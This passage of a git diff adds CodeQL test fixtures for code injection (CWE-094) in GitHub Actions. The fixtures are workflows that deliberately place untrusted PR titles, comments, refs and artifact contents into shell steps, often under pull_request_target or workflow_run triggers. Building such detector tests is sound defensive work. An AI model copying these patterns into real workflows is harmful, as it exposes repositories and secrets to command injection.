"$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - uses: actions/checkout@v4 + # To avoid failure when multiple commits are merged into `main` in a short period of time. + # Checking out to an old commit beyond the fetch depth will get an error `fatal: reference is not a tree: ... + # (Only required for `workflow_run` event, where we get the latest HEAD on `main` instead of the event commit) + with: + fetch-depth: 20 + + - name: Update clone using environment variables + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - uses: actions/download-artifact@v4 + - name: Send message to Slack + env: + CI_SLACK_BOT_TOKEN: ${{ secrets.CI_SLACK_BOT_TOKEN }} + CI_SLACK_CHANNEL_ID: ${{ secrets.CI_SLACK_CHANNEL_ID }} + CI_SLACK_CHANNEL_ID_DAILY: ${{ secrets.CI_SLACK_CHANNEL_ID_DAILY }} + CI_SLACK_CHANNEL_DUMMY_TESTS: ${{ secrets.CI_SLACK_CHANNEL_DUMMY_TESTS }} + CI_SLACK_REPORT_CHANNEL_ID: ${{ secrets.CI_SLACK_CHANNEL_ID }} + ACCESS_REPO_INFO_TOKEN: ${{ secrets.ACCESS_REPO_INFO_TOKEN }} + CI_EVENT: push + CI_TITLE_PUSH: ${{ github.event.head_commit.message }} + CI_TITLE_WORKFLOW_RUN: ${{ github.event.workflow_run.head_commit.message }} + CI_SHA: ${{ env.CI_SHA }} + SETUP_STATUS: ${{ needs.setup.result }} + + # We pass `needs.setup.outputs.matrix` as the argument. A processing in `notification_service.py` to change + # `models/bert` to `models_bert` is required, as the artifact names use `_` instead of `/`. + run: | + pip install slack_sdk + pip show slack_sdk + python utils/notification_service.py "${{ needs.setup.outputs.matrix }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml new file mode 100644 index 000000000000..dc101c769449 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml @@ -0,0 +1,56 @@ +name: tests + +on: + workflow_run: + workflows: ["Tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + get-artifacts: + name: Get required artifacts + runs-on: ubuntu-latest + permissions: + actions: read + statuses: write + outputs: + pr_num: ${{ steps.set-ref.outputs.pr_num }} + ref: ${{ steps.set-ref.outputs.ref }} + steps: + - name: Download and extract event file + uses: actions/download-artifact@v4 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + run-id: ${{ github.event.workflow_run.id }} + name: event_file + path: artifacts/event_file + + - name: Try to read PR number + id: set-ref + run: | + pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) + if [ -z "$pr_num" ] || [ "$pr_num" == "null" ]; then + pr_num="" + fi + + ref=$pr_num + if [ -z "$ref" ] || [ "$ref" == "null" ]; then + ref=${{ github.ref }} + fi + + echo "pr_num=$pr_num" >> $GITHUB_OUTPUT + echo "ref=$ref" >> $GITHUB_OUTPUT + + test2: + name: test2 + runs-on: ubuntu-latest + needs: get-artifacts + permissions: + actions: read + statuses: write + steps: + - run: echo ${{ needs.get-artifacts.outputs.pr_num }} + - run: echo ${{ needs.get-artifacts.outputs.ref }} + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml new file mode 100644 index 000000000000..f81bef89568f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml @@ -0,0 +1,13 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.pull_request.title || "foo" }}" + + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml new file mode 100644 index 000000000000..1e5c7eec177d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml @@ -0,0 +1,14 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.changes.body.from }}" + - run: echo "${{ github.event.changes.title.from }}" + - run: echo "${{ github.event.changes.head.ref.from }}" + - run: echo "${{ toJson(github.event.changes) }}" + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml new file mode 100644 index 000000000000..6d925a82d372 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml @@ -0,0 +1,51 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.changed-files.outputs.files }}" + test2: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "files=${FILES}" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.changed-files.outputs.files }}" + test3: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + test4: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml new file mode 100644 index 000000000000..a39967760e8e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml @@ -0,0 +1,38 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title }}" + test2: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title }}" + test3: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + - run: echo "${{ env.TITLE }}" + test4: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" + - run: echo "${{ env.TITLE }}" + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml new file mode 100644 index 000000000000..0b3002506a14 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml @@ -0,0 +1,231 @@ +name: 📤 Preview Deploy + +on: + workflow_run: + workflows: + - đŸŽŦ Setup + types: + - completed + +permissions: + contents: read + pull-requests: write + +jobs: + setup: + if: ${{ github.event.workflow_run.conclusion == 'success' }} + runs-on: ubuntu-latest + + outputs: + id: ${{ steps.pr.outputs.value }} + ref: ${{ steps.ref.outputs.value }} + repo: ${{ steps.repo.outputs.value }} + + steps: + # Get PR id from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-id + + - name: get PR id + id: pr + run: echo "value=$(> $GITHUB_OUTPUT + + # Get PR ref from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-ref + + - name: get PR ref + id: ref + run: echo "value=$(> $GITHUB_OUTPUT + + # Get PR repo from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-repo + + - name: get PR repo + id: repo + run: echo "value=$(> $GITHUB_OUTPUT + + prepare: + runs-on: ubuntu-latest + needs: [setup] + + steps: + # ================= Create Comment ================= + - name: đŸ§Ŋ Find And Delete Comment + uses: peter-evans/find-comment@v2 + if: ${{ needs.setup.outputs.id != '' }} + id: fc + with: + issue-number: ${{ needs.setup.outputs.id }} + comment-author: 'github-actions[bot]' + body-includes: View Deployment + + - name: 📝 Create or update comment + uses: peter-evans/create-or-update-comment@v3 + if: ${{ needs.setup.outputs.id != '' }} + with: + comment-id: ${{ steps.fc.outputs.comment-id }} + issue-number: ${{ needs.setup.outputs.id }} + body: | + ## View Deployment + + [#${{ github.run_id }}](https://github.com/dream-num/univer/actions/runs/${{ github.run_id }}) + +

+ đŸĨ 🍔 đŸĨ“ đŸĨ— đŸĨ˜ đŸŒ¯ 🍚 🍛 🍖 🍭 🍧 🍝 đŸĨĒ đŸĨ– đŸĒ
+ Still cooking, please come back later
+ đŸĨ™ đŸĨŽ đŸĨ¨ 🌭 đŸĻ 🍙 🍕 🍰 🍮 🍜 🍡 🍱 đŸŋ 🍕 đŸĨŸ +

+ edit-mode: replace + + build-demo: + runs-on: ubuntu-latest + needs: [setup] + + outputs: + preview-url: ${{ steps.vercel-demo-dev.outputs.preview-url == '' && steps.vercel-demo.outputs.preview-url || steps.vercel-demo-dev.outputs.preview-url }} + commit-message: ${{ steps.commit-message.outputs.value }} + + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + repository: ${{ needs.setup.outputs.repo }} + ref: ${{ needs.setup.outputs.ref }} + + - name: Setup pnpm + uses: pnpm/action-setup@v4 + with: + run_install: false + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: pnpm + + - name: Install dependencies + run: pnpm install + + - name: Get commit message + id: commit-message + run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT + + # ================= Deploy Demo ================= + - name: đŸ“Ļ Build demo + run: pnpm build:demo + + - name: Copy demo to workspace + run: | + mkdir .workspace + cp -r ./examples/local/* .workspace + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref == '' }} + id: vercel-demo + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID}} + vercel-args: --prod + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref != '' }} + id: vercel-demo-dev + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID}} + + build-storybook: + runs-on: ubuntu-latest + needs: [setup] + + outputs: + preview-url: ${{ steps.vercel-storybook-dev.outputs.preview-url == '' && steps.vercel-storybook.outputs.preview-url || steps.vercel-storybook-dev.outputs.preview-url }} + + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + repository: ${{ needs.setup.outputs.repo }} + ref: ${{ needs.setup.outputs.ref }} + + - name: Setup pnpm + uses: pnpm/action-setup@v4 + with: + run_install: false + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: pnpm + + - name: Install dependencies + run: pnpm install + + # ================= Deploy Storybook ================= + - name: đŸ“Ļ Build storybook + run: pnpm storybook:build + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref == '' }} + id: vercel-storybook + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID_STORYBOOK}} + vercel-args: --prod + + - name: 🚀 Deploy to Vercel (storybook) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref != '' }} + id: vercel-storybook-dev + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID_STORYBOOK}} + + notify: + runs-on: ubuntu-latest + needs: [setup, build-demo, build-storybook] + + steps: + - name: Invoke deployment hook + uses: actions/github-script@v3 + with: + script: > + { + "type": "build", + "workflow": { + "id": "${{ github.run_id }}" + }, + "commit": { + "ref": "${{ needs.setup.outputs.ref }}", + "message": "${{ needs.build-demo.outputs.commit-message }}", + "id": "${{ github.event.workflow_run.head_commit.id }}", + "author": "${{ github.event.workflow_run.head_commit.author.name }}" + }, + "preview": { + "📑 Examples": "${{ needs.build-demo.outputs.preview-url }}/", + "📚 Storybook": "${{ needs.build-storybook.outputs.preview-url }}/" + } + } + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml new file mode 100644 index 000000000000..559c69c4710f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml @@ -0,0 +1,74 @@ +name: Test + +on: + issue_comment: + +permissions: + contents: read + pull-requests: write + +jobs: + setup: + runs-on: ubuntu-latest + steps: + - name: Get PR details + id: get-pr + if: github.event_name == 'issue_comment' + uses: octokit/request-action@v2.x + with: + route: GET /repos/${{ github.repository }}/pulls/${{ github.event.issue.number }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Set PR source branch as env variable + if: github.event_name == 'issue_comment' + run: | + PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') + echo "BRANCH=$PR_SOURCE_BRANCH" >> $GITHUB_ENV + setup2: + runs-on: ubuntu-latest + steps: + - name: Get PR details + uses: octokit/request-action@v2.x + id: get-pr-details + with: + route: GET /repos/{repository}/pulls/{pull_number} + repository: ${{ github.repository }} + pull_number: ${{ github.event.issue.number }} + env: + GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} + - name: Set environment variables + run: | + MERGE_STATUS=${{ fromJson(steps.get-pr-details.outputs.data).mergeable }} + if $MERGE_STATUS; then echo "COMMENT=\[Fast Forward CI\] ${{ env.HEAD_REF }} cannot be merged into ${{ env.BASE_REF }} at the moment." >> $GITHUB_ENV; fi + echo "MERGE_STATUS=$MERGE_STATUS" >> $GITHUB_ENV + echo "BASE_REF=${{ fromJson(steps.get-pr-details.outputs.data).base.ref }}" >> $GITHUB_ENV + echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV + setup3: + runs-on: ubuntu-latest + steps: + - id: issues + uses: octokit/request-action@v2.x + with: + route: GET /repos/${{ github.repository_owner }}/${{ github.repository }}/issues?state=open + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN}} + - run: | + echo '${{ steps.issues.outputs.data }}' > issues.json + setup4: + runs-on: ubuntu-latest + steps: + - id: get-pull-request + uses: octokit/request-action@v2.x + with: + route: GET /repos/{owner}/{repo}/pulls/{pull_number} + owner: foo + repo: bar + pull_number: ${{ github.event.issue.number }} + + - run: >- + echo "Pull request title is \"${{ + fromJson(steps.get-pull-request.outputs.data).title }}\" but expected + \"Updated test pull request\"" && exit 1 + + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml new file mode 100644 index 000000000000..552ad866b5ae --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml @@ -0,0 +1,33 @@ +on: + workflow_dispatch: + +jobs: + fetch-issues: + runs-on: ubuntu-latest + steps: + - name: Fetch open issues + id: issues + uses: octokit/request-action@v2.x + with: + route: GET /repos/foo/bar/issues?state=open + env: + GITHUB_TOKEN: ${{ secrets.GITHUBACTIONS_TOKEN }} + + - name: Write issues to file + run: | + echo '${{ steps.issues.outputs.data }}' > issues.json + + - name: Setup Node.js + uses: actions/setup-node@v2 + with: + node-version: '14' + + - name: Print issue URLs + run: | + const fs = require('fs'); + const issues = JSON.parse(fs.readFileSync('issues.json', 'utf8')); + const filteredIssues = issues.filter(issue => issue.body.includes('Is your portal managed or self-hosted?\r\n\r\nManaged')); + for (const issue of filteredIssues) { + console.log(issue.html_url); + } + shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml new file mode 100644 index 000000000000..804d55a7db28 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml @@ -0,0 +1,112 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + pulls1: + runs-on: ubuntu-latest + steps: + - id: head_ref + run: | + HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName') + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.head_ref.outputs.head_ref}}" + - id: title + run: | + TITLE=$(gh pr view $PR_NUMBER --json title --jq .title) + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh pr view $PR_NUMBER --json body --jq .body) + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + - id: files + run: | + CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')" + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.files.outputs.files}}" + - id: author + run: | + AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.author.outputs.author}}" + pulls2: + runs-on: ubuntu-latest + steps: + - id: head_ref + run: | + HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1) + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.head_ref.outputs.head_ref}}" + - id: title + run: | + TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title") + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body") + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + - id: files + run: | + CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename') + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.files.outputs.files}}" + - id: author + run: | + AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login") + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.author.outputs.author}}" + issues1: + runs-on: ubuntu-latest + steps: + - id: title + run: | + TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title') + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body') + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body') + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + issues2: + runs-on: ubuntu-latest + steps: + - id: title + run: | + TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title") + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body") + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + + + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml new file mode 100644 index 000000000000..03ee63fe9cf4 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml @@ -0,0 +1,64 @@ +name: List files + +on: + pull_request_target: + types: [ opened, synchronize, workflow_dispatch] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed + with: + list-files: json + filters: | + locale: + - '*.xml' + - name: Changed files 1 + run: | + echo changed: ${{ steps.changed.outputs.locale_files }} + echo changed: ${{ steps.changed.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed2 + with: + list-files: csv + filters: | + locale: + - '*.xml' + - name: Changed files 2 + run: | + echo changed:${{ steps.changed2.outputs.locale_files }} + echo changed: ${{ steps.changed2.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed3 + with: + list-files: shell + filters: | + locale: + - '*.xml' + - name: Changed files 3 + run: | + echo changed:${{ steps.changed3.outputs.locale_files }} + echo changed: ${{ steps.changed3.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed4 + with: + list-files: escape + filters: | + locale: + - '*.xml' + - name: Changed files 4 + run: | + echo changed:${{ steps.changed4.outputs.locale_files }} + echo changed: ${{ steps.changed4.outputs.changes }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml new file mode 100644 index 000000000000..27d8a666fc9e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml @@ -0,0 +1,19 @@ + +on: [ workflow_dispatch, pull_request ] +jobs: + test: + runs-on: ubuntu-20.04 + steps: + - name: Preliminary Information + run: | + echo "The job was automatically triggered by a ${{ github.event_name }} event." + echo "This job is now running on a ${{ runner.os }} server hosted by GitHub!" + echo "The name of your branch is ${{ github.ref }} and your repository is ${{ github.repository }}." + echo " " + echo "github.ref = ${{ github.ref }}" + echo "github.sha = ${{ github.sha }}" + echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" + echo "github.event.pull_request.head.sha = ${{ github.event.pull_request.head.sha }}" + echo "github.event.pull_request.base.ref = ${{ github.event.pull_request.base.ref }}" + echo "github.event.pull_request.base.sha = ${{ github.event.pull_request.base.sha }}" + echo " " diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml new file mode 100644 index 000000000000..03ecc20de86a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml @@ -0,0 +1,24 @@ +on: + push: + branches: + - main + - 'release/v*' + workflow_dispatch: + inputs: + version: + required: true + description: 'Release' + type: string + +jobs: + release-tag: + runs-on: ubuntu-latest + if: ${{ startsWith(github.event.head_commit.message, 'release:') }} + steps: + - name: Extract version and PR number from commit message + id: extract_info + shell: bash + run: | + echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT + echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT + echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml new file mode 100644 index 000000000000..52f7e8964c13 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml @@ -0,0 +1,12 @@ +on: + workflow_run: + workflows: [ 'Pull-Request Checks' ] + types: [ completed ] + +jobs: + publish-results: + uses: TestOrg/TestRepo/.github/workflows/publishResults.yml@master + with: + botGithubId: bot + secrets: + githubBotPAT: ${{ secrets.BOT_PAT }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml new file mode 100644 index 000000000000..184bcd966108 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml @@ -0,0 +1,64 @@ +on: + workflow_run: + +jobs: + test: + runs-on: ubuntu-22.04 + if: > + (github.event.workflow_run.event == 'pull_request' || + github.event.workflow_run.event == 'pull_request_target') && + github.event.workflow_run.conclusion == 'success' + + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "doc-build-artifact" + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{steps.setup-env.outputs.current_work_dir}}/doc-build-artifact.zip', Buffer.from(download.data)); + + - run: | + mkdir build_dir + unzip doc-build-artifact.zip -d build_dir + + - name: Get commit_sha & pr_number + id: github-context + run: | + content_commit_sha=$(cat ./build_dir/commit_sha) + if [[ $content_commit_sha =~ ^[0-9a-zA-Z]{40}$ ]]; then + echo "commit_sha=$content_commit_sha" >> $GITHUB_OUTPUT + rm -rf ./build_dir/commit_sha + else + echo "Encountered an invalid commit_sha" + exit 1 + fi + + content_pr_number=$(cat ./build_dir/pr_number) + if [[ $content_pr_number =~ ^[0-9]+$ ]]; then + echo "pr_number=$content_pr_number" >> $GITHUB_OUTPUT + rm -rf ./build_dir/pr_number + else + echo "Encountered an invalid pr_number" + exit 1 + fi + + - run: | + echo "hub_docs_url=pr_${{ steps.github-context.outputs.pr_number }}" >> $GITHUB_OUTPUT + + - run: | + cd build_dir + doc-builder push --commit_msg "Updated with commit ${{ steps.github-context.outputs.commit_sha }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml new file mode 100644 index 000000000000..a90c55df9377 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml @@ -0,0 +1,19 @@ +on: + issues: + +jobs: + test: + runs-on: ubuntu-22.04 + steps: + - name: Run Issue form parser + id: parse + uses: peter-murray/issue-forms-body-parser@v4.0.0 + with: + issue_id: ${{ github.event.issue.number }} + separator: '###' + label_marker_start: '>>' + label_marker_end: '<<' + + - name: Show parsed data JSON + run: | + echo ${{ steps.parse.outputs.payload }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml new file mode 100644 index 000000000000..0bd666dc9485 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml @@ -0,0 +1,13 @@ +name: Issue Forms Body Parser + +on: issues + +jobs: + process: + runs-on: ubuntu-latest + steps: + - name: Issue Forms Body Parser + id: parse + uses: zentered/issue-forms-body-parser@v2.0.0 + - run: echo ${{ steps.parse.outputs.data }} + - run: echo ${{ toJSON(steps.parse.outputs.data) }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml new file mode 100644 index 000000000000..8648d86983ee --- 